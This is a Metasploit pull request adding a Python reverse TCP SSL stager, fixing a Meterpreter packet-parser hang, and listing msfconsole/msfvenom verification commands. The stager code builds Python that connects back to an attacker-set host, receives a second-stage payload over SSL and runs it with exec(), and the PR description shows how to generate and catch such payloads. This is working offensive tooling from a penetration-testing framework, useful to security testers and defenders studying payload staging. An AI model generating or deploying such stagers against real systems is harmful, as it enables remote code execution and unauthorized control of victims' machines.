### PR TITLE
Rebase and fix #6573, adding SSL stager support for Python payloads

### DIFF
--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -1,0 +1,73 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/verify_ssl'
+require 'msf/core/payload/python/reverse_tcp'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for Python
+#
+###
+
+module Payload::Python::ReverseTcpSsl
+
+  include Msf::Payload::Python
+  include Msf::Payload::Python::ReverseTcp
+  include Msf::Payload::Windows::VerifySsl
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                         datastore['HandlerSSLCert'])
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count: datastore['ReverseConnectRetries'],
+      ssl:              true,
+      verify_cert_hash: verify_cert_hash
+    }
+
+    generate_reverse_tcp_ssl(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_tcp_ssl(opts)
+  end
+
+  def generate_reverse_tcp_ssl(opts={})
+    # Set up the socket
+    cmd  = "import ssl,socket,struct\n"
+    cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
+    cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "s=ssl.wrap_socket(so)\n"
+    cmd << py_send_uuid if include_send_uuid
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+
+    py_create_exec_stub(cmd)
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+

--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -1,14 +1,13 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/payload/windows/verify_ssl'
 require 'msf/core/payload/python/reverse_tcp'
 
 module Msf
 
 ###
 #
-# Complex reverse_tcp payload generation for Python
+# Complex reverse_tcp_ssl payload generation for Python
 #
 ###
 
@@ -16,20 +15,14 @@ module Payload::Python::ReverseTcpSsl
 
   include Msf::Payload::Python
   include Msf::Payload::Python::ReverseTcp
-  include Msf::Payload::Windows::VerifySsl
 
   #
   # Generate the first stage
   #
   def generate
-    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                         datastore['HandlerSSLCert'])
     conf = {
       port:        datastore['LPORT'],
-      host:        datastore['LHOST'],
-      retry_count: datastore['ReverseConnectRetries'],
-      ssl:              true,
-      verify_cert_hash: verify_cert_hash
+      host:        datastore['LHOST']
     }
 
     generate_reverse_tcp_ssl(conf)
@@ -43,8 +36,8 @@ module Payload::Python::ReverseTcpSsl
     false
   end
 
-  def transport_config(opts={})
-    transport_config_reverse_tcp_ssl(opts)
+  def supports_ssl?
+    true
   end
 
   def generate_reverse_tcp_ssl(opts={})

--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -62,7 +62,8 @@ class PacketParser
         # header size doesn't include the xor key, which is always tacked on the front
         self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4)
       end
-    elsif (self.payload_length_left > 0)
+    end
+    if (self.payload_length_left > 0)
       buf = sock.read(self.payload_length_left)
 
       if (buf)

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl'
 
 module MetasploitModule
 
-  CachedSize = 317
+  CachedSize = 378
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcpSsl

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -1,0 +1,30 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/core/payload/python/reverse_tcp_ssl'
+
+module Metasploit3
+
+  CachedSize = 317
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Python::ReverseTcpSsl
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse TCP SSL Stager',
+      'Description'   => 'Reverse Python connect back stager using SSL',
+      'Author'        => ['Ben Campbell', 'RageLtMan'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Stager'        => {'Payload' => ""}
+      ))
+  end
+
+end

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/core/payload/python/reverse_tcp_ssl'
 
-module Metasploit3
+module MetasploitModule
 
   CachedSize = 317
 

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2284,6 +2284,17 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'python/meterpreter/reverse_tcp'
   end
 
+  context 'python/meterpreter/reverse_tcp_ssl' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'stagers/python/reverse_tcp_ssl',
+                            'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_tcp_ssl'
+  end
+
   context 'python/meterpreter/reverse_tcp_uuid' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This is an updated version of PR #6573 from @sempervictus. We stared and poked and prodded and finally @jinq102030 found the magic sauce to fix the hang in packet processing from the original PR. Basically, it looks like if the whole packet is not ready for processing on the first round, the packet RX parsing state machine gets stuck and never dequeues another response. Python over SSL just happened to tickle this condition.

This could use testing on multiple payloads, since fixing this affects core code interfaced with by every other Meterpreter payload.
## Verification
- [x] Run a python meterpreter reverse tcp ssl listener: `msfconsole -qx use exploit/multi/handler; set payload python/meterpreter/reverse_tcp_ssl; set lhost 127.0.0.1; run`
- [x] Generate a python/meterpreter/reverse_tcp_ssl payload: `msfvenom -p python/meterpreter/reverse_tcp_ssl LHOST=127.0.0.1 -f raw -o test.py`
- [x] **Verify** that the payload stages, connects and can be interacted with
- [x] Run a python shell reverse tcp ssl listener: `msfconsole -qx use exploit/multi/handler; set payload python/shell_reverse_tcp_ssl; set lhost 127.0.0.1; run`
- [x] Generate a python/meterpreter/reverse_tcp_ssl payload: `msfvenom -p python/shell_reverse_tcp_ssl LHOST=127.0.0.1 -f raw -o test.py`
- [x] **Verify** that the payload stages, connects and can be interacted with
- [x] Test a few other Meterpreter payloads and verify that the fix here doesn't break other payloads.
